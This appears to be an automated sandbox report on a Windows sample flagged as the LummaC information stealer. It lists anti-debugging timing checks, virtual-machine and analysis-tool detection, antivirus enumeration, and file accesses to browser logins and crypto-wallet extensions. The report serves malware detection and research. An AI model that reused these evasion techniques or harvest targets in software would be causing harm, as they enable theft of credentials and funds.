Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90740 second address: 4F90746 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90746 second address: 4F9074A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F9074A second address: 4F907F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a pushad 0x0000000b mov ecx, 7613577Fh 0x00000010 pushfd 0x00000011 jmp 00007FA93CFE6D64h 0x00000016 sbb ecx, 69EB0F68h 0x0000001c jmp 00007FA93CFE6D5Bh 0x00000021 popfd 0x00000022 popad 0x00000023 call 00007FA93CFE6D68h 0x00000028 mov si, C261h 0x0000002c pop esi 0x0000002d popad 0x0000002e mov dword ptr [esp], eax 0x00000031 pushad 0x00000032 mov cl, dl 0x00000034 mov cx, 2C5Bh 0x00000038 popad 0x00000039 xchg eax, ebx 0x0000003a jmp 00007FA93CFE6D5Eh 0x0000003f push eax 0x00000040 pushad 0x00000041 mov di, 9AD4h 0x00000045 pushfd 0x00000046 jmp 00007FA93CFE6D5Dh 0x0000004b xor eax, 115A2996h 0x00000051 jmp 00007FA93CFE6D61h 0x00000056 popfd 0x00000057 popad 0x00000058 xchg eax, ebx 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c mov ax, di 0x0000005f mov eax, edi 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90070 second address: 4F900CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 movsx ebx, ax 0x00000008 popad 0x00000009 mov ebp, esp 0x0000000b jmp 00007FA93D08FA28h 0x00000010 xchg eax, ecx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FA93D08FA1Eh 0x00000018 or si, BFB8h 0x0000001d jmp 00007FA93D08FA1Bh 0x00000022 popfd 0x00000023 mov eax, 7ECF6BEFh 0x00000028 popad 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FA93D08FA20h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F900CE second address: 4F900D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F900D4 second address: 4F900D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90D6E second address: 4F90D8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, edi 0x00000006 popad 0x00000007 popad 0x00000008 add dword ptr [esp], 66F56FBBh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA93CFE6D5Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90D8B second address: 4F90DAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, DEh 0x00000005 mov cx, D349h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c call 00007FA9AEA547F1h 0x00000011 push 76952B70h 0x00000016 push dword ptr fs:[00000000h] 0x0000001d mov eax, dword ptr [esp+10h] 0x00000021 mov dword ptr [esp+10h], ebp 0x00000025 lea ebp, dword ptr [esp+10h] 0x00000029 sub esp, eax 0x0000002b push ebx 0x0000002c push esi 0x0000002d push edi 0x0000002e mov eax, dword ptr [769B4538h] 0x00000033 xor dword ptr [ebp-04h], eax 0x00000036 xor eax, ebp 0x00000038 push eax 0x00000039 mov dword ptr [ebp-18h], esp 0x0000003c push dword ptr [ebp-08h] 0x0000003f mov eax, dword ptr [ebp-04h] 0x00000042 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000049 mov dword ptr [ebp-08h], eax 0x0000004c lea eax, dword ptr [ebp-10h] 0x0000004f mov dword ptr fs:[00000000h], eax 0x00000055 ret 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007FA93D08FA1Eh 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90DAE second address: 4F90DBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F90E18 second address: 4F90E82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA93D08FA1Fh 0x00000009 sbb eax, 2DAD79CEh 0x0000000f jmp 00007FA93D08FA29h 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a je 00007FA9AEA4354Bh 0x00000020 jmp 00007FA93D08FA1Ch 0x00000025 cmp dword ptr [ebp+08h], 00002000h 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FA93D08FA27h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0B7B second address: 4FA0BA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 mov dx, 0FF6h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA93CFE6D69h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0BA3 second address: 4FA0BF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 64159CE2h 0x00000008 pushfd 0x00000009 jmp 00007FA93D08FA23h 0x0000000e jmp 00007FA93D08FA23h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [esp], ebp 0x0000001a jmp 00007FA93D08FA26h 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0BF7 second address: 4FA0BFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0BFD second address: 4FA0C0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA93D08FA1Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0C0C second address: 4FA0C73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93CFE6D69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FA93CFE6D5Ch 0x00000013 sub ax, 5298h 0x00000018 jmp 00007FA93CFE6D5Bh 0x0000001d popfd 0x0000001e movzx esi, dx 0x00000021 popad 0x00000022 push eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushfd 0x00000027 jmp 00007FA93CFE6D5Eh 0x0000002c adc ax, FCF8h 0x00000031 jmp 00007FA93CFE6D5Bh 0x00000036 popfd 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0C73 second address: 4FA0C9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 mov esi, edx 0x00000007 mov bx, CAD4h 0x0000000b popad 0x0000000c popad 0x0000000d xchg eax, esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA93D08FA25h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0C9A second address: 4FA0CA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0CA0 second address: 4FA0CB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA93D08FA23h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0CB7 second address: 4FA0CBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0CBB second address: 4FA0D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+0Ch] 0x0000000b jmp 00007FA93D08FA25h 0x00000010 test esi, esi 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FA93D08FA1Ch 0x00000019 sbb eax, 457BBB48h 0x0000001f jmp 00007FA93D08FA1Bh 0x00000024 popfd 0x00000025 popad 0x00000026 je 00007FA9AEA3D0CFh 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f push esi 0x00000030 pop ebx 0x00000031 mov ah, 89h 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0D0C second address: 4FA0D35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA93CFE6D62h 0x00000008 pop eax 0x00000009 mov ax, di 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f cmp dword ptr [769B459Ch], 05h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0D35 second address: 4FA0D4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA93D08FA22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0D4B second address: 4FA0D51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0D51 second address: 4FA0DDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FA9AEA55154h 0x0000000e jmp 00007FA93D08FA29h 0x00000013 xchg eax, esi 0x00000014 pushad 0x00000015 mov dx, ax 0x00000018 mov ch, 3Fh 0x0000001a popad 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FA93D08FA27h 0x00000025 and cx, 130Eh 0x0000002a jmp 00007FA93D08FA29h 0x0000002f popfd 0x00000030 pushfd 0x00000031 jmp 00007FA93D08FA20h 0x00000036 xor ecx, 44369988h 0x0000003c jmp 00007FA93D08FA1Bh 0x00000041 popfd 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0E20 second address: 4FA0E24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0E24 second address: 4FA0E28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0E28 second address: 4FA0E2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0E2E second address: 4FA0E3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA93D08FA1Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0E3D second address: 4FA0E41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0E41 second address: 4FA0E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FA93D08FA24h 0x0000000e xchg eax, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA93D08FA1Ah 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0E6D second address: 4FA0E71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0E71 second address: 4FA0E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FA0E77 second address: 4FA0E88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA93CFE6D5Dh 0x00000009 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 108B80 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 108AFF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 2B77D6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 3359E6 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0010E1CA rdtsc

0_2_0010E1CA

Source: C:\Users\user\Desktop\file.exe TID: 6948	Thread sleep time: -180000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6948	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: file.exe, file.exe, 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000003.2212690171.000000000593B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: file.exe, 00000000.00000003.2212690171.000000000593B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: file.exe, 00000000.00000003.2212690171.000000000593B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: file.exe, 00000000.00000003.2212690171.000000000593B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: file.exe, 00000000.00000003.2212690171.000000000593B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: file.exe, 00000000.00000003.2212690171.000000000593B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: file.exe, 00000000.00000002.2344169345.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342679298.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000003.2212690171.000000000593B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: file.exe, 00000000.00000003.2212690171.000000000593B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: file.exe, 00000000.00000003.2212690171.000000000593B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: file.exe, 00000000.00000003.2212690171.000000000593B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: file.exe, 00000000.00000003.2212690171.000000000593B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: file.exe, 00000000.00000003.2212690171.0000000005941000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696487552p
Source: file.exe, 00000000.00000003.2212690171.000000000593B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: file.exe, 00000000.00000003.2212690171.000000000593B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: file.exe, 00000000.00000003.2212690171.000000000593B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: file.exe, 00000000.00000003.2212690171.000000000593B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: file.exe, 00000000.00000003.2212690171.000000000593B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: file.exe, 00000000.00000003.2212690171.000000000593B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: file.exe, 00000000.00000003.2212690171.000000000593B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: file.exe, 00000000.00000003.2212690171.000000000593B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: file.exe, 00000000.00000002.2344104986.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: file.exe, 00000000.00000003.2212690171.000000000593B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: file.exe, 00000000.00000003.2212690171.000000000593B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: file.exe, 00000000.00000003.2212690171.000000000593B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: file.exe, 00000000.00000003.2212690171.000000000593B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: file.exe, 00000000.00000003.2212690171.000000000593B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: file.exe, 00000000.00000003.2212690171.000000000593B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: file.exe, 00000000.00000003.2212690171.000000000593B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: file.exe, 00000000.00000003.2212690171.000000000593B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: file.exe, 00000000.00000003.2212690171.000000000593B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: file.exe, 00000000.00000003.2212690171.000000000593B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: file.exe, 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000003.2212690171.000000000593B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: file.exe, 00000000.00000003.2212690171.000000000593B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0010E1CA rdtsc

0_2_0010E1CA

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000EB480 LdrInitializeThunk,

0_2_000EB480

Source: file.exe	Binary or memory string: 2}Program Manager
Source: file.exe, 00000000.00000002.2343347154.0000000000290000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: file.exe, 00000000.00000003.2300263343.0000000000FFF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2344336830.0000000000FFF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: les%\Windows Defender\MsMpeng.exe
Source: file.exe, 00000000.00000003.2282477322.000000000101D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342679298.0000000000F7F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2282551373.0000000001021000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2344169345.0000000000F7F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2299863908.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: file.exe PID: 5632, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000003.2261632719.0000000001015000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\wallets
Source: file.exe, 00000000.00000003.2261632719.0000000001015000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: file.exe, 00000000.00000003.2261632719.0000000001015000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/JAXX New Version
Source: file.exe, 00000000.00000003.2299804026.000000000100F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520
Source: file.exe, 00000000.00000003.2235655968.0000000001002000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Exodus
Source: file.exe, 00000000.00000003.2190452514.0000000001001000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: erations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\
Source: file.exe, 00000000.00000003.2235655968.0000000001002000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe, 00000000.00000003.2235655968.0000000001002000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
